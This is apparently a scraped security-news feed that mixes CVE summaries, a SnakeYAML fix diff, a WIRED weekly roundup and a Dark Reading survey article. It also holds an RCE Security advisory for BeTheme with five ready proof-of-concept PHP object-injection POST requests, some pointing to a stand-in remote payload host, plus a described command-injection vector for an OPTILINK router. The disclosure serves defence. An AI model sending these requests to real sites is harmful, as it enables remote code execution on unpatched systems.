super-xray is a web vulnerability scanning tool. Versions prior to 0.7 assumed trusted input for the program config which is stored in a yaml file. An attacker with local access to the file could exploit this and compromise the program. This issue has been addressed in commit `4d0d5966` and will be included in future releases. Users are advised to upgrade. There are no known workarounds for this issue.

@@ -12,7 +12,9 @@ import com.intellij.uiDesigner.core.Spacer; import org.apache.log4j.LogManager; import org.apache.log4j.Logger; import org.yaml.snakeyaml.LoaderOptions; import org.yaml.snakeyaml.Yaml; import org.yaml.snakeyaml.constructor.SafeConstructor;  
import javax.swing.\*; import javax.swing.border.TitledBorder; @@ -224,7 +226,7 @@ public void reloadConfig(boolean init, boolean reset) { } configTemplate = configStr;  
Yaml yaml = new Yaml(); Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); configObj = yaml.load(configStr);  
try { @@ -684,7 +686,7 @@ public void initPluginSave() { }  
public void refreshConfig() { Yaml yaml = new Yaml(); Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); StringWriter writer = new StringWriter(); yaml.dump(configObj, writer); configStr = writer.toString();

CVE-2022-41958: yaml rce · 4ra1n/super-xray@4d0d596

TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter command in the setTracerouteCfg function.

CVE-2022-44258

Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2020-23584**

**OPTILINK E-PON "MODEL NO: OP-XT71000N" with "HARDWARE VERSION: V2.2"; & "FIRMWARE VERSION: OP\_V3.3.1-191028"**

Unauthenticated remote code execution on "OPTILINK OP-XT71000N, Hardware Version: V2.2". The issue occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag\_tracert\_admin.asp " in the "PingTest" parameter that leads to command execution.

**TARGET**

/diag\_tracert\_admin.asp

**Attack Vector**

pass arbitrary commands with IP-ADDRESS using " | " to execute commands.

**REGARDS**

Huzaifa Hussain

https://twitter.com/disguised\_noob

https://www.linkedin.com/in/huzaifa-hussain-046791179

CVE-2020-23584: GitHub - huzaifahussain98/CVE-2020-23584: REMOTE CODE EXECUTION

There is a broken access control vulnerability in the Maarch RM 2.8.3 solution. When accessing some specific document (pdf, email) from an archive, a preview is proposed by the application. This preview generates a URL including an md5 hash of the file accessed. The document's URL (https://{url}/tmp/{MD5 hash of the document}) is then accessible without authentication.

**Bienvenue chez Maarch****Nous sommes éditeurs de logiciels ouverts  
spécialisés dans la gestion documentaire****Maarch est un influenceur des usages du numérique  
car nous diffusons largement nos produits.**

**Nos Valeurs**

Depuis notre création en 2004, nous nous sommes fixé des lignes directrices fortes auxquelles nous n'avons jamais cessé de croire :

**Sécurité  
**Suivi des normes ISO 14641-1 et NF Z42-013 , assurance de la non-altération de l’ensemble des ressources.

**Tracabilité  
**Nos logiciels disposent de pistes d’audit fiables et opposables.

**Ouverture  
** Le code de nos logiciels est totalement ouvert, auditable et documenté.

**Innovation**  
Notre équipe R&D travaille au quotidien pour être à la pointe de la technologie.

**Libre & Open Source  
**Logiciels téléchargeables librement et déployés sous licence GNU/GPL v.3

**100 % France  
**Maarch est une entreprise française, du groupe Xelians, implantée en Ile-de-France.

Jean-Louis ERCOLANI  
Fondateur & Directeur Général

**Qui sommes-nous ?**

**Avec 30 employés, Maarch est **une entreprise française à taille humaine située à Nanterre, faisant partie du groupe XELIANS**.**

Depuis 2008, nous avons su faire l’unanimité et séduire de nombreuses **administrations publiques** ainsi que des **grands acteurs du secteur privé.**

L’équipe Maarch est donc composée de spécialistes de l’édition logicielle et de la gestion documentaire en **archivage électronique et gestion du courrier.**

**Nos produits à votre disposition**

Les solutions documentaires pour optimiser le fonctionnement de votre organisation

**Maarch Courrier  
**La solution de gestion de vos courriers professionnels : numérisez, partagez, rédondez, signez et classez.

**Maarch Parapheur**  
Le système de gestion des processus de signature électronique autonome, multimode et interopérable.

**Maarch RM**  
Le système d’archivage électronique pour conserver et exploiter vos ressources numériques en toute conformité.

**Nos services**

Nos équipes vous accompagnent pour faire de chaque projet un véritable succès.

**Support & maintenance**  
Maintenance corrective, évolutive, préventive, adaptative ou réglementaire…

**Intégration**  
Etude préalable  
Ateliers de conception  
Installations SaaS ou OnPremise  
Chaîne de numérisation  
Intégration au SI  
Personnalisation & paramétrage  
Assistance à la recette  
Assistance au démarrage

**Formations**  
Manuels de formation personnalisés  
Formations de formateurs ou d’utilisateurs finaux  
Formation des administrateurs techniques et fonctionnels

**Le code de nos logiciels est totalement ouvert, auditable et documenté.**

Maarch fait le choix du logiciel libre pour **placer l’utilisateur au centre de son processus de développement technico-fonctionnel.** Nous sommes intimement convaincus que la maîtrise parfaite d’un logiciel découle de son ouverture.

De cette façon, notre communauté d’utilisateurs est **totalement libre d’exécuter, de copier, de distribuer, d’étudier, de modifier et d’améliorer nos logiciels,** permettant le développement de fonctionnalités toujours plus proche des usages métiers.

Le caractère libre de nos logiciels est la cerise sur le gâteau : avant tout nous nous efforçons d’en faire les meilleurs dans leur domaine !

Nous utilisons des cookies sur notre site Web pour vous offrir l'expérience la plus pertinente en mémorisant vos préférences et vos visites répétées. En cliquant sur "Accepter tout", vous consentez à l'utilisation de TOUS les cookies. Cependant, vous pouvez visiter "Paramètres des cookies" pour fournir un consentement contrôlé.

CVE-2022-37774: Maarch – Sécurisez vos documents professionnels

After months of meticulous planning, investigators finally move in to catch AlphaBay’s mastermind red-handed. Then the case takes a tragic turn.

The Hunt for the Dark Web’s Biggest Kingpin, Part 5: Takedown

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

The Spacer WordPress plugin before 3.0.7 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3618

Plus: Google’s location snooping ends in a $391 million settlement, Russian code sneaks into US government apps, and the World Cup apps set off alarms.

It was a truly wild week in the tech industry as new details emerged about the FTX cryptocurrency exchange's collapse and Elon Musk drove an ever-increasing number of Twitter employees out of the company. Cryptocurrency tracers have been scrambling to understand what happened to nearly half a billion dollars worth of cryptocurrency that was pulled out of FTX last weekend. It seems that some of it may have been seized by government authorities in the Bahamas, but the mystery is still unraveling. 

Meanwhile, the wheels have increasingly been coming off the bus at Twitter. Earlier this week, for example, some users weren't receiving vital two-factor authentication codes sent over SMS, and it's unclear whether the problem has been fully resolved. With its staffing shortages and so much upheaval, we took a look at what the impacts would be if Twitter suffered a massive data breach or another major security attack in this precarious moment.

New research indicates that telehealth sites too often put addiction patient data at risk, with tracking tech lurking on substance-abuse-focused websites. And we've got part four in the series “The Hunt for the Dark Web’s Biggest Kingpin,” which chronicles the rise and fall of dark web marketplace AlphaBay. This installment tells how law enforcement agents in the Dutch National High-Tech Crime Unit took over and ran the dark web marketplace Hansa and follows US and Thai police as they were closing in on AlphaBay's kingpin, Alpha02, on the brink of attempting a dramatic arrest.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

A significant hack-and-leak operation in Moldova has released alleged Telegram correspondence of at least two politicians, leading to scandal and allegations of corruption. The site, called “Moldova Leaks,” has also threatened to release more data on government officials and politicians. The site published alleged messages from Moldova's minister of justice, Sergiu Litvinenco, and defense and national security adviser to the president Dorin Recean in the past two weeks. Some of the conversations imply that other Moldovan officials have won rigged elections or have been installed improperly in their positions, and the leaks particularly seem targeted at undermining anti-corruption officials. Moldova's pro-Russian political opposition has been quick to spread allegations based on the leaks that Litvinenco, Recean, and others must be removed from office. 

The Moldovan Justice Ministry said the leaked data is stolen, but it added that some of it has been manipulated. Litvinenco and other officials in Moldova's government have said that Russia is behind the operation. "The purpose of this fake is to divert the public's attention from the real problems faced by criminal groups in the Republic of Moldova and their connections with foreign services," Litvinenco wrote on Facebook. At the end of October, _The Washington Post_ reported on efforts by Russia's FSB security agency to undermine Moldova's pro-European government.

Google will pay a total of $391.5 million to 40 US states following an investigation related to the tech giant's user location tracking practices. The probe, a collaboration between state attorneys general, looked at whether Google had deceived users and obfuscated its location-tracking activities. “Consumers thought they had turned off their location tracking features on Google, but the company continued to secretly record their movements and use that information for advertisers,” Oregon attorney general Ellen Rosenblum told _The Washington Post_. "We settled an investigation with 40 US state attorneys general based on outdated product policies that we changed years ago,” Google wrote in a blog post about the agreement on Monday. “As well as a financial settlement, we will be making updates in the coming months to provide even greater controls and transparency over location data.”

Thousands of mobile apps in the Google Play and Apple App Store include code modules from a company called Pushwoosh that claims to be based in Washington, DC, but that Reuters reports is actually based in Russia. The Centers for Disease Control and Prevention incorporated Pushwoosh code into seven of its public apps and removed the service after learning of Reuters' findings. The CDC said that it had been misled about where Pushwoosh was headquartered. In March, the US Army also removed an app used by soldiers at a prominent US combat training base because it incorporated Pushwoosh code. In marketing materials and US regulatory filings, the company claims to be based in California, Maryland, or DC, but it actually pays taxes in Russia and is headquartered in Novosibirsk in Siberia. The company apparently had roughly 40 employees and reported revenue of 143,270,000 rubles (about $2.4 million) in 2021. Though it is unclear if Pushwoosh ever abused its position in apps distributed in the US or elsewhere, the Russian government has a track record of conducting “software supply chain” attacks for intelligence gathering as well as destructive attacks on its enemies.

Data and privacy regulators in Norway, France, and Germany have all warned that World Cup attendees should not download Qatar’s two World Cup apps or should do so on a wiped device if necessary. Officials warn that the apps are invasive, collecting significantly more data than they should and more than they claim to in their privacy policies. “One of the apps collects data on whether and with which number a telephone call is made,” Germany’s data protection commission said in an alert this week. “The other app actively prevents the device on which it is installed from going into sleep mode. It is also obvious that the data used by the apps not only remain locally on the device but are also transmitted to a central server.” World Cup events begin this weekend.

A Destabilizing Hack-and-Leak Operation Hits Moldova

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 11 and Nov. 18. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for November 11 to 18

Researchers find current data protections strategies are failing to get the job done, and IT leaders are concerned, while a lack of qualified IT security talent hampers cyber-defense initiatives.

Organizations are struggling with mounting data losses, increased downtime, and rising recovery costs due to cyberattacks — to the tune of $1.06 million in costs per incident. Meanwhile, IT security staffs are stalled on getting defenses up to speed.

That's according to the 2022 Dell Global Data Protection Index (GDPI) survey of 1,000 IT decision-makers across 15 countries and 14 industries, which found that organizations that experienced disruption have also suffered an average of 2TB data loss and 19 hours of downtime. 

Most respondents (67%) said they lack confidence that their existing data protection measures are sufficient to cope with malware and ransomware threats. A full 63% said they are not very confident that all business-critical data can be reliably recovered in the event of a destructive cyberattack.

Their fears seem founded: Nearly half of respondents (48%) experienced a cyberattack in the past 12 months that prevented access to their data (a 23% increase from 2021) — and that's a trend that Colm Keegan, senior consultant for data protection solutions at Dell Technologies, says will likely continue. 

"The growth and increased distribution of data across edge, core data center and multiple public cloud environments are making it exceedingly difficult for IT admins to protect their data," Keegan explains.

On the protection front, most organizations are falling behind; for instance, 91% are aware of or planning to deploy a zero-trust architecture, but only 12% are fully deployed.

And it's not just advanced defense that's lacking: Keegan points out that 69% of respondents stated they simply cannot meet their backup windows to be prepared for a ransomware attack.

**Data Protection Strategies Face Headwinds**

One of the primary reasons data protection strategies are failing is the lack of visibility of where that data resides and what it is — a problem exacerbated by the rapid, ongoing adoption of cloud-native apps and containers. More than three-quarters of survey respondents said there is a lack of common data protection solutions for these newer technologies.

"Seventy-two percent said they are unable to keep up with what their developers are doing in the cloud — it’s basically a blind spot for them," Keegan says.  

Claude Mandy, chief evangelist of data security at Symmetry Systems, a provider of hybrid cloud data security solutions, agrees that a lack of visibility is the primary reason current data-protection strategies fail.

"Organizations simply do not know what data they have, where it is, let alone how it is protected," he says. "Unfortunately, a lot of the data-protection failures are preventable by simply knowing the answers to these questions."

He adds that the problem is worsened by the constant change of data within an organization. From his perspective, the sheer scale and complexity of millions of individual data objects across thousands of data stored in multiple clouds, multiplied by a seemingly infinite combination of roles and permissions for thousands of user and machine identities, would be challenging for chief information security officers (CISOs) to secure even if they were static. They're not, so the situation is even more challenging.

To boot, in a lot of cases, organizations are using multiple data security tools for different silos of information, with no overarching integration between them.

"The billions of objects form over months or years, and change constantly," Mandy says. "This is further exacerbated through continuous data flows, privilege creep, data sprawl, and organizational churn, resulting in \[visibility\] to data that is far from ideal."

**Zero-Trust Implementation Lags, Despite Interest**

Zero trust is growing in popularity in enterprise security because not trusting users by default works well to reduce risk. Indeed, virtually all the GDPI respondents indicated they intend to implement zero trust into their environments at some point.

However, actual deployment is not happening at a rapid pace — as mentioned, only 12% of respondents indicated they have fully deployed at zero-trust architecture into their environments. According to researchers, the main problem is a critical shortfall in IT skills, particularly as it relates to cyber recovery and data protection.

Widely reported shortages of trained cybersecurity professionals are driving the industry to try to come up with some with creative recruiting and training solutions, but just 65 cybersecurity professionals are in the workforce for every 100 available jobs, a recent study shows.

"If you don’t have cybersecurity professionals on staff, it’s virtually impossible to make progress on deploying a zero-trust framework, unless, of course, you rely on partners to help you get there," Keegan says. "Now consider the demand for these resources in the market. Like supply chain constraints, demand is high, and the supply is low."

Patrick Tiquet, vice president of security and architecture at Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, says that zero-trust management can be challenging even with staff on board.

"Implementation of \[zero trust\] is currently a common data-protection strategy," he explains. "However, for \[zero trust\] to be effective, access and roles must first be configured correctly."

This means ensuring the right people have access to the right data and resources within the zero-trust architecture. Roles must be implemented that are adequately scoped to protect the data that role can access — and correctly configuring access to data just one time ("set it and forget it," in other words) is not enough.

"The organization must maintain and manage data access through the lifecycle of the data, and as the organization grows," Tiquet adds. "Organizations must make sure that, as teams grow and change, the access given to a specific role is still appropriate."

**Vendor Consolidation on the To-Do List**

Keegan says it’s likely there will be some retooling at organizations in terms of platforms — many survey respondents (85%) said they believe they would see a benefit through reducing the number of data protection vendors they work with.

"The research tends to support this sentiment," he adds. "For example, those using a single data protection vendor had far fewer incidents of data loss than those using multiple vendors."

Likewise, the cost of data loss incidents resulting from a cyber attack was approximately 34% higher for those organizations working with multiple data protection vendors than those using a single vendor, according to the survey.

John Bambenek, principal threat hunter at Netenrich, a security and operations analytics software-as-a-service (SaaS) company, says the current spate of M&A and consolidation in the cybersecurity market speaks to those drivers — but warns that vendors trying to be all things to all security problems has its own downsides.

"The larger tech firms get, the less ability they have to innovate and solve problems leading to opportunities for new vendors to step in with new solutions," he explains. "It's \[a cycle\] we see of M&A frenzy and stagnation, then new companies enter to innovate — and more M&A."

Keegan, meanwhile, says he is hearing calls in the analyst community that organizations need to consider shifting their investments from cybersecurity prevention to resiliency.

"This means accepting the inevitability that security breaches will occur," he notes. "Moreover, companies need to have a plan that enables them to recover their critical data and business applications in a timely manner to meet their service level objectives."

Tag

#acer